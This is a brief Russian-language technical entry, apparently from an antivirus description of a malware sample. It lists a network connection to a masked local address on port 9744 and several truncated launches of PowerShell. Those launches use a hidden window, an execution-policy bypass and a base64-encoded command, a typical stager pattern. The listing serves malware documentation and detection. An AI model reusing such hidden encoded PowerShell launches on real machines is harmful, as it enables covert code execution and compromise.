Техническая информация
- '<LOCALNET>.43.35':9744
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgA...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -noprofile -win hidden -EncodedCommand aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQ...